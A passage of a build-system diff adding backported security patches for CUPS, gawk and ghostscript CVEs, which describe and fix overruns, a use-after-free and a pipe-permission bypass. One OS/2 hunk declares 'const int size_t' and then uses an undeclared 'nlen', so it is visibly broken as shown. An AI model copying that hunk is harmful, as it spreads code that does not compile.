+Date: Fri, 1 Sep 2023 16:47:29 +0200
+Subject: [PATCH] raster-interpret.c: Fix CVE-2023-4504
+
+We didn't check for end of buffer if it looks there is an escaped
+character - check for NULL terminator there and if found, return NULL
+as return value and in `ptr`, because a lone backslash is not
+a valid PostScript character.
+
+Upstream-Status: Backport [https://github.com/OpenPrinting/cups/commit/2431caddb7e6a87f04ac90b5c6366ad268b6ff31]
+CVE: CVE-2023-4504
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ cups/raster-interpret.c | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+--- a/cups/raster-interpret.c
++++ b/cups/raster-interpret.c
+@@ -1113,7 +1113,19 @@ scan_ps(_cups_ps_stack_t *st,		/* I  - S
+ 
+ 	    cur ++;
+ 
+-            if (*cur == 'b')
++	   /*
++	    * Return NULL if we reached NULL terminator, a lone backslash
++            * is not a valid character in PostScript.
++	    */
++
++	    if (!*cur)
++	    {
++	      *ptr = NULL;
++
++	      return (NULL);
++	    }
++
++	    if (*cur == 'b')
+ 	      *valptr++ = '\b';
+ 	    else if (*cur == 'f')
+ 	      *valptr++ = '\f';
diff --git a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
index 65a99fc28d..e726899c52 100644
--- a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
+++ b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
@@ -1,6 +1,7 @@
 SUMMARY = "Collection of autoconf m4 macros"
 SECTION = "base"
 HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/"
+DESCRIPTION = "A collection of autoconf macros, plus an autogen.sh script that can be used with them."
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a"
 
@@ -13,7 +14,7 @@ do_configure() {
 }
 
 do_install() {
-	oe_runmake CWAUTOMACROSPREFIX=${D}${prefix} install
+	oe_runmake LABEL=`date -d @${SOURCE_DATE_EPOCH} +%Y%m%d` CWAUTOMACROSPREFIX=${D}${prefix} install
 
 	# cleanup buildpaths in autogen.sh
 	sed -i -e 's,${D},,g' ${D}${prefix}/share/cwautomacros/scripts/autogen.sh
diff --git a/meta/recipes-extended/ed/ed_1.15.bb b/meta/recipes-extended/ed/ed_1.15.bb
index 886c3ddcab..60e6a3d34e 100644
--- a/meta/recipes-extended/ed/ed_1.15.bb
+++ b/meta/recipes-extended/ed/ed_1.15.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Line-oriented text editor"
 HOMEPAGE = "http://www.gnu.org/software/ed/"
+DESCRIPTION = "GNU ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, both interactively and via shell scripts. A restricted version of ed, red, can only edit files in the current directory and cannot execute shell commands."
 
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \
diff --git a/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
new file mode 100644
index 0000000000..c6cba058a7
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
@@ -0,0 +1,28 @@
+From e709eb829448ce040087a3fc5481db6bfcaae212 Mon Sep 17 00:00:00 2001
+From: "Arnold D. Robbins" <arnold@skeeve.com>
+Date: Wed, 3 Aug 2022 13:00:54 +0300
+Subject: [PATCH] Smal bug fix in builtin.c.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/gawk/tree/debian/patches/CVE-2023-4156.patch?h=ubuntu/focal-security
+Upstream commit https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212]
+CVE: CVE-2023-4156
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ChangeLog | 6 ++++++
+ builtin.c | 5 ++++-
+ 2 files changed, 10 insertions(+), 1 deletion(-)
+
+--- gawk-5.1.0.orig/builtin.c
++++ gawk-5.1.0/builtin.c
+@@ -957,7 +957,10 @@ check_pos:
+ 					s1++;
+ 					n0--;
+ 				}
+-				if (val >= num_args) {
++				// val could be less than zero if someone provides a field width
++				// so large that it causes integer overflow. Mainly fuzzers do this,
++				// but let's try to be good anyway.
++				if (val < 0 || val >= num_args) {
+ 					toofew = true;
+ 					break;
+ 				}
diff --git a/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
new file mode 100644
index 0000000000..167c0787ee
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
@@ -0,0 +1,24 @@
+These tests require an unloaded host as otherwise timing sensitive tests can fail
+https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+--- a/test/Maketests~
++++ b/test/Maketests
+@@ -2069,7 +2069,2 @@
+
+-timeout:
+-	@echo $@ $(ZOS_FAIL)
+-	@AWKPATH="$(srcdir)" $(AWK) -f $@.awk  >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+-	@-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+ typedregex1:
+@@ -2297,7 +2292,2 @@
+ 	@-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+-time:
+-	@echo $@
+-	@AWKPATH="$(srcdir)" $(AWK) -f $@.awk  >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+-	@-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+
diff --git a/meta/recipes-extended/gawk/gawk_5.0.1.bb b/meta/recipes-extended/gawk/gawk_5.0.1.bb
index e79ccfdebf..c71890c19e 100644
--- a/meta/recipes-extended/gawk/gawk_5.0.1.bb
+++ b/meta/recipes-extended/gawk/gawk_5.0.1.bb
@@ -16,7 +16,9 @@ PACKAGECONFIG[readline] = "--with-readline,--without-readline,readline"
 PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr"
 
 SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \
+           file://remove-sensitive-tests.patch \
            file://run-ptest \
+           file://CVE-2023-4156.patch \
 "
 
 SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb"
@@ -41,13 +43,20 @@ inherit ptest
 do_install_ptest() {
 	mkdir ${D}${PTEST_PATH}/test
 	ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk
-	for i in `grep -vE "@|^$|#|Gt-dummy" ${S}/test/Maketests |awk -F: '{print $1}'` Maketests inclib.awk; \
-	  do cp ${S}/test/$i* ${D}${PTEST_PATH}/test; \
+	# The list of tests is all targets in Maketests, apart from the dummy Gt-dummy
+	TESTS=$(awk -F: '$1 == "Gt-dummy" { next } /[[:alnum:]]+:$/ { print $1 }' ${S}/test/Maketests)
+	for i in $TESTS Maketests inclib.awk; do
+		cp ${S}/test/$i* ${D}${PTEST_PATH}/test
 	done
 	sed -i -e 's|/usr/local/bin|${bindir}|g' \
 	    -e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk
 
-        sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+	sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+
+	# These tests require an unloaded host as otherwise timing sensitive tests can fail
+	# https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+	rm -f ${D}${PTEST_PATH}/test/time.*
+	rm -f ${D}${PTEST_PATH}/test/timeout.*
 }
 
 RDEPENDS_${PN}-ptest += "make"
diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
new file mode 100644
index 0000000000..91b9f6df50
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
@@ -0,0 +1,31 @@
+From d81b82c70bc1fb9991bb95f1201abb5dea55f57f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 17 Jul 2023 14:06:37 +0100
+Subject: [PATCH] Bug 706897: Copy pcx buffer overrun fix from
+ devices/gdevpcx.c
+
+Bounds check the buffer, before dereferencing the pointer.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=d81b82c70bc1fb9991bb95f1201abb5dea55f57f]
+CVE: CVE-2023-38559
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gdevdevn.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gdevdevn.c b/base/gdevdevn.c
+index 3b019d6..2888776 100644
+--- a/base/gdevdevn.c
++++ b/base/gdevdevn.c
+@@ -1980,7 +1980,7 @@ devn_pcx_write_rle(const byte * from, const byte * end, int step, gp_file * file
+         byte data = *from;
+ 
+         from += step;
+-        if (data != *from || from == end) {
++        if (from >= end || data != *from) {
+             if (data >= 0xc0)
+                 gp_fputc(0xc1, file);
+         } else {
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
new file mode 100644
index 0000000000..ea8bf26f3f
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
@@ -0,0 +1,109 @@
+From 8c7bd787defa071c96289b7da9397f673fddb874 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Wed, 20 May 2020 16:02:07 +0100
+Subject: [PATCH] txtwrite - address memory problems
+
+Bug #702229 " txtwrite: use after free in 9.51 on some files (regression from 9.50)"
+Also bug #702346 and the earlier report #701877.
+
+The problems occur because its possible for a single character code in
+a PDF file to map to more than a single Unicode code point. In the case
+of the file for 701877 the character code maps to 'f' and 'i' (it is an
+fi ligature).
+
+The code should deal with this, but we need to ensure we are using the
+correct index. In addition, if we do get more Unicode code points than
+we expected, we need to set the widths of the 'extra' code points to
+zero (we only want to consider the width of the original character).
+
+This does mean increasing the size of the Widths array to cater for
+the possibility of more entries on output than there were on input.
+
+While working on it I noticed that the Unicode remapping on little-
+endian machines was reversing the order of the Unicode values, when
+there was more than a single code point returned, so fixed that at
+the same time.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=8c7bd787defa071c96289b7da9397f673fddb874]
+CVE: CVE-2020-36773
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/vector/gdevtxtw.c | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
+diff --git a/devices/vector/gdevtxtw.c b/devices/vector/gdevtxtw.c
+index 87f9355..bddce5a 100644
+--- a/devices/vector/gdevtxtw.c
++++ b/devices/vector/gdevtxtw.c
+@@ -1812,11 +1812,11 @@ static int get_unicode(textw_text_enum_t *penum, gs_font *font, gs_glyph glyph,
+ #else
+         b = (char *)Buffer;
+         u = (char *)unicode;
+-        while (l >= 0) {
+-            *b++ = *(u + l);
+-            l--;
+-        }
+ 
++	for (l=0;l<length;l+=2, u+=2){
++	    *b++ = *(u+1);
++	    *b++ = *u;
++	}
+ #endif
+         gs_free_object(penum->dev->memory, unicode, "free temporary unicode buffer");
+         return length / sizeof(short);
+@@ -1963,7 +1963,7 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+                           &penum->text_state->matrix, &wanted);
+         pte->returned.total_width.x += wanted.x;
+         pte->returned.total_width.y += wanted.y;
+-        penum->Widths[pte->index - 1] = wanted.x;
++        penum->Widths[penum->TextBufferIndex] = wanted.x;
+ 
+         if (pte->text.operation & TEXT_ADD_TO_ALL_WIDTHS) {
+             gs_point tpt;
+@@ -1984,8 +1984,14 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+         pte->returned.total_width.x += dpt.x;
+         pte->returned.total_width.y += dpt.y;
+ 
+-        penum->TextBufferIndex += get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
+-        penum->Widths[pte->index - 1] += dpt.x;
++	penum->Widths[penum->TextBufferIndex] += dpt.x;
++	code = get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
++	/* If a single text code returned multiple Unicode values, then we need to set the
++	 * 'extra' code points' widths to 0.
++	 */
++	if (code > 1)
++	    memset(&penum->Widths[penum->TextBufferIndex + 1], 0x00, (code - 1) * sizeof(float));
++	penum->TextBufferIndex += code;
+     }
+     return 0;
+ }
+@@ -2123,7 +2129,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+     if (!penum->text_state->Widths)
+         return gs_note_error(gs_error_VMerror);
+     memset(penum->text_state->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+-    memcpy(penum->text_state->Widths, penum->Widths, penum->text.size * sizeof(float));
++    memcpy(penum->text_state->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+ 
+     unsorted_entry->Unicode_Text = (unsigned short *)gs_malloc(tdev->memory->stable_memory,
+         penum->TextBufferIndex, sizeof(unsigned short), "txtwrite alloc sorted text buffer");
+@@ -2136,7 +2142,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+     if (!unsorted_entry->Widths)
+         return gs_note_error(gs_error_VMerror);
+     memset(unsorted_entry->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+-    memcpy(unsorted_entry->Widths, penum->Widths, penum->text.size * sizeof(float));
++    memcpy(unsorted_entry->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+ 
+     unsorted_entry->FontName = (char *)gs_malloc(tdev->memory->stable_memory,
+         (strlen(penum->text_state->FontName) + 1), sizeof(unsigned char), "txtwrite alloc sorted text buffer");
+@@ -2192,7 +2198,7 @@ textw_text_process(gs_text_enum_t *pte)
+         if (!penum->TextBuffer)
+             return gs_note_error(gs_error_VMerror);
+         penum->Widths = (float *)gs_malloc(tdev->memory->stable_memory,
+-            pte->text.size, sizeof(float), "txtwrite temporary widths array");
++            pte->text.size * 4, sizeof(float), "txtwrite temporary widths array");
+         if (!penum->Widths)
+             return gs_note_error(gs_error_VMerror);
+     }
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
new file mode 100644
index 0000000000..033ba77f9a
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
@@ -0,0 +1,121 @@
+From 3920a727fb19e19f597e518610ce2416d08cb75f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Thu, 20 Aug 2020 17:19:09 +0100
+Subject: [PATCH] Fix pdfwrite "%d" mode with file permissions
+
+Firstly, in gx_device_delete_output_file the iodev pointer was being passed
+to the delete_method incorrectly (passing a pointer to that pointer). Thus
+when we attempted to use that to confirm permission to delete the file, it
+crashed. Credit to Ken for finding that.
+
+Secondly, due to the way pdfwrite works, when running with an output file per
+page, it creates the current output file immediately it has completed writing
+the previous one. Thus, it has to delete that partial file on exit.
+
+Previously, the output file was not added to the "control" permission list,
+so an attempt to delete it would result in an error. So add the output file
+to the "control" as well as "write" list.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gsdevice.c |  2 +-
+ base/gslibctx.c | 20 ++++++++++++++------
+ 2 files changed, 15 insertions(+), 7 deletions(-)
+
+diff --git a/base/gsdevice.c b/base/gsdevice.c
+index 913119495..ac78af93f 100644
+--- a/base/gsdevice.c
++++ b/base/gsdevice.c
+@@ -1185,7 +1185,7 @@ int gx_device_delete_output_file(const gx_device * dev, const char *fname)
+         parsed.len = strlen(parsed.fname);
+     }
+     if (parsed.iodev)
+-        code = parsed.iodev->procs.delete_file((gx_io_device *)(&parsed.iodev), (const char *)parsed.fname);
++        code = parsed.iodev->procs.delete_file((gx_io_device *)(parsed.iodev), (const char *)parsed.fname);
+     else
+         code = gs_note_error(gs_error_invalidfileaccess);
+ 
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index d726c58b5..ff8fc895e 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -647,7 +647,7 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+     char *fp, f[gp_file_name_sizeof];
+     const int pipe = 124; /* ASCII code for '|' */
+     const int len = strlen(fname);
+-    int i;
++    int i, code;
+ 
+     /* Be sure the string copy will fit */
+     if (len >= gp_file_name_sizeof)
+@@ -658,8 +658,6 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+     rewrite_percent_specifiers(f);
+     for (i = 0; i < len; i++) {
+         if (f[i] == pipe) {
+-           int code;
+-
+            fp = &f[i + 1];
+            /* Because we potentially have to check file permissions at two levels
+               for the output file (gx_device_open_output_file and the low level
+@@ -671,10 +669,16 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+            if (code < 0)
+                return code;
+            break;
++           code = gs_add_control_path(mem, gs_permit_file_control, f);
++           if (code < 0)
++               return code;
+         }
+         if (!IS_WHITESPACE(f[i]))
+             break;
+     }
++    code = gs_add_control_path(mem, gs_permit_file_control, fp);
++    if (code < 0)
++        return code;
+     return gs_add_control_path(mem, gs_permit_file_writing, fp);
+ }
+ 
+@@ -684,7 +688,7 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+     char *fp, f[gp_file_name_sizeof];
+     const int pipe = 124; /* ASCII code for '|' */
+     const int len = strlen(fname);
+-    int i;
++    int i, code;
+ 
+     /* Be sure the string copy will fit */
+     if (len >= gp_file_name_sizeof)
+@@ -694,8 +698,6 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+     /* Try to rewrite any %d (or similar) in the string */
+     for (i = 0; i < len; i++) {
+         if (f[i] == pipe) {
+-           int code;
+-
+            fp = &f[i + 1];
+            /* Because we potentially have to check file permissions at two levels
+               for the output file (gx_device_open_output_file and the low level
+@@ -704,6 +706,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+               the pipe_fopen(), the leading '|' has been stripped.
+             */
+            code = gs_remove_control_path(mem, gs_permit_file_writing, f);
++           if (code < 0)
++               return code;
++           code = gs_remove_control_path(mem, gs_permit_file_control, f);
+            if (code < 0)
+                return code;
+            break;
+@@ -711,6 +716,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+         if (!IS_WHITESPACE(f[i]))
+             break;
+     }
++    code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++    if (code < 0)
++        return code;
+     return gs_remove_control_path(mem, gs_permit_file_writing, fp);
+ }
+ 
+-- 
+2.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
new file mode 100644
index 0000000000..beade79eef
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
@@ -0,0 +1,37 @@
+From 9daf042fd7bb19e93388d89d9686a2fa4496f382 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 24 Aug 2020 09:24:31 +0100
+Subject: [PATCH] Coverity 361429: move "break" to correct place.
+
+We had to add the outputfile to the "control" file permission list (as well
+as write), but for the "pipe" case, I accidentally added the call after the
+break out of loop that checks for a pipe.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gslibctx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index ff8fc895e..63dfbe2e0 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -668,10 +668,10 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+            code = gs_add_control_path(mem, gs_permit_file_writing, f);
+            if (code < 0)
+                return code;
+-           break;
+            code = gs_add_control_path(mem, gs_permit_file_control, f);
+            if (code < 0)
+                return code;
++           break;
+         }
+         if (!IS_WHITESPACE(f[i]))
+             break;
+-- 
+2.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
new file mode 100644
index 0000000000..e3f9e81c45
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
@@ -0,0 +1,238 @@
+From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Tue, 7 Sep 2021 20:36:12 +0100
+Subject: [PATCH] Bug 704342: Include device specifier strings in access
+ validation
+
+for the "%pipe%", %handle%" and %printer% io devices.
+
+We previously validated only the part after the "%pipe%" Postscript device
+specifier, but this proved insufficient.
+
+This rebuilds the original file name string, and validates it complete. The
+slight complication for "%pipe%" is it can be reached implicitly using
+"|" so we have to check both prefixes.
+
+Addresses CVE-2021-3781
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gdevpipe.c | 22 +++++++++++++++-
+ base/gp_mshdl.c | 11 +++++++-
+ base/gp_msprn.c | 10 ++++++-
+ base/gp_os2pr.c | 13 +++++++++-
+ base/gslibctx.c | 69 ++++++++++---------------------------------------
+ 5 files changed, 65 insertions(+), 60 deletions(-)
+
+diff --git a/base/gdevpipe.c b/base/gdevpipe.c
+index 96d71f5d8..5bdc485be 100644
+--- a/base/gdevpipe.c
++++ b/base/gdevpipe.c
+@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ #else
+     gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+     gs_fs_list_t *fs = ctx->core->fs;
++    /* The pipe device can be reached in two ways, explicltly with %pipe%
++       or implicitly with "|", so we have to check for both
++     */
++    char f[gp_file_name_sizeof];
++    const char *pipestr = "|";
++    const size_t pipestrlen = strlen(pipestr);
++    const size_t preflen = strlen(iodev->dname);
++    const size_t nlen = strlen(fname);
++    int code1;
++
++    if (preflen + nlen >= gp_file_name_sizeof)
++        return_error(gs_error_invalidaccess);
++
++    memcpy(f, iodev->dname, preflen);
++    memcpy(f + preflen, fname, nlen + 1);
++
++    code1 = gp_validate_path(mem, f, access);
++
++    memcpy(f, pipestr, pipestrlen);
++    memcpy(f + pipestrlen, fname, nlen + 1);
+ 
+-    if (gp_validate_path(mem, fname, access) != 0)
++    if (code1 != 0 && gp_validate_path(mem, f, access) != 0 )
+         return gs_error_invalidfileaccess;
+ 
+     /*
+diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c
+index 2b964ed74..8d87ceadc 100644
+--- a/base/gp_mshdl.c
++++ b/base/gp_mshdl.c
+@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access,
+     long hfile;	/* Correct for Win32, may be wrong for Win64 */
+     gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+     gs_fs_list_t *fs = ctx->core->fs;
++    char f[gp_file_name_sizeof];
++    const size_t preflen = strlen(iodev->dname);
++    const size_t nlen = strlen(fname);
+ 
+-    if (gp_validate_path(mem, fname, access) != 0)
++    if (preflen + nlen >= gp_file_name_sizeof)
++        return_error(gs_error_invalidaccess);
++
++    memcpy(f, iodev->dname, preflen);
++    memcpy(f + preflen, fname, nlen + 1);
++
++    if (gp_validate_path(mem, f, access) != 0)
+         return gs_error_invalidfileaccess;
+ 
+     /* First we try the open_handle method. */
+diff --git a/base/gp_msprn.c b/base/gp_msprn.c
+index ed4827968..746a974f7 100644
+--- a/base/gp_msprn.c
++++ b/base/gp_msprn.c
+@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+     unsigned long *ptid = &((tid_t *)(iodev->state))->tid;
+     gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+     gs_fs_list_t *fs = ctx->core->fs;
++    const size_t preflen = strlen(iodev->dname);
++    const size_t nlen = strlen(fname);
+ 
+-    if (gp_validate_path(mem, fname, access) != 0)
++    if (preflen + nlen >= gp_file_name_sizeof)
++        return_error(gs_error_invalidaccess);
++
++    memcpy(pname, iodev->dname, preflen);
++    memcpy(pname + preflen, fname, nlen + 1);
++
++    if (gp_validate_path(mem, pname, access) != 0)
+         return gs_error_invalidfileaccess;
+ 
+     /* First we try the open_printer method. */
+diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c
+index f852c71fc..ba54cde66 100644
+--- a/base/gp_os2pr.c
++++ b/base/gp_os2pr.c
+@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+            FILE ** pfile, char *rfname, uint rnamelen)
+ {
+     os2_printer_t *pr = (os2_printer_t *)iodev->state;
+-    char driver_name[256];
++    char driver_name[gp_file_name_sizeof];
+     gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+     gs_fs_list_t *fs = ctx->core->fs;
++    const size_t preflen = strlen(iodev->dname);
++    const int size_t = strlen(fname);
++
++    if (preflen + nlen >= gp_file_name_sizeof)
++        return_error(gs_error_invalidaccess);
++
++    memcpy(driver_name, iodev->dname, preflen);
++    memcpy(driver_name + preflen, fname, nlen + 1);
++
++    if (gp_validate_path(mem, driver_name, access) != 0)
++        return gs_error_invalidfileaccess;
+ 
+     /* First we try the open_printer method. */
+     /* Note that the loop condition here ensures we don't
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 6dfed6cd5..318039fad 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s)
+ int
+ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+-    char *fp, f[gp_file_name_sizeof];
+-    const int pipe = 124; /* ASCII code for '|' */
+-    const int len = strlen(fname);
+-    int i, code;
++    char f[gp_file_name_sizeof];
++    int code;
+ 
+     /* Be sure the string copy will fit */
+-    if (len >= gp_file_name_sizeof)
++    if (strlen(fname) >= gp_file_name_sizeof)
+         return gs_error_rangecheck;
+     strcpy(f, fname);
+-    fp = f;
+     /* Try to rewrite any %d (or similar) in the string */
+     rewrite_percent_specifiers(f);
+-    for (i = 0; i < len; i++) {
+-        if (f[i] == pipe) {
+-           fp = &f[i + 1];
+-           /* Because we potentially have to check file permissions at two levels
+-              for the output file (gx_device_open_output_file and the low level
+-              fopen API, if we're using a pipe, we have to add both the full string,
+-              (including the '|', and just the command to which we pipe - since at
+-              the pipe_fopen(), the leading '|' has been stripped.
+-            */
+-           code = gs_add_control_path(mem, gs_permit_file_writing, f);
+-           if (code < 0)
+-               return code;
+-           code = gs_add_control_path(mem, gs_permit_file_control, f);
+-           if (code < 0)
+-               return code;
+-           break;
+-        }
+-        if (!IS_WHITESPACE(f[i]))
+-            break;
+-    }
+-    code = gs_add_control_path(mem, gs_permit_file_control, fp);
++
++    code = gs_add_control_path(mem, gs_permit_file_control, f);
+     if (code < 0)
+         return code;
+-    return gs_add_control_path(mem, gs_permit_file_writing, fp);
++    return gs_add_control_path(mem, gs_permit_file_writing, f);
+ }
+ 
+ int
+ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+-    char *fp, f[gp_file_name_sizeof];
+-    const int pipe = 124; /* ASCII code for '|' */
+-    const int len = strlen(fname);
+-    int i, code;
++    char f[gp_file_name_sizeof];
++    int code;
+ 
+     /* Be sure the string copy will fit */
+-    if (len >= gp_file_name_sizeof)
++    if (strlen(fname) >= gp_file_name_sizeof)
+         return gs_error_rangecheck;
+     strcpy(f, fname);
+-    fp = f;
+     /* Try to rewrite any %d (or similar) in the string */
+-    for (i = 0; i < len; i++) {
+-        if (f[i] == pipe) {
+-           fp = &f[i + 1];
+-           /* Because we potentially have to check file permissions at two levels
+-              for the output file (gx_device_open_output_file and the low level
+-              fopen API, if we're using a pipe, we have to add both the full string,
+-              (including the '|', and just the command to which we pipe - since at
+-              the pipe_fopen(), the leading '|' has been stripped.
+-            */
+-           code = gs_remove_control_path(mem, gs_permit_file_writing, f);
+-           if (code < 0)
+-               return code;
+-           code = gs_remove_control_path(mem, gs_permit_file_control, f);
+-           if (code < 0)
+-               return code;
+-           break;
+-        }
+-        if (!IS_WHITESPACE(f[i]))
+-            break;
+-    }
+-    code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++    rewrite_percent_specifiers(f);
++
++    code = gs_remove_control_path(mem, gs_permit_file_control, f);
+     if (code < 0)
+         return code;
+-    return gs_remove_control_path(mem, gs_permit_file_writing, fp);
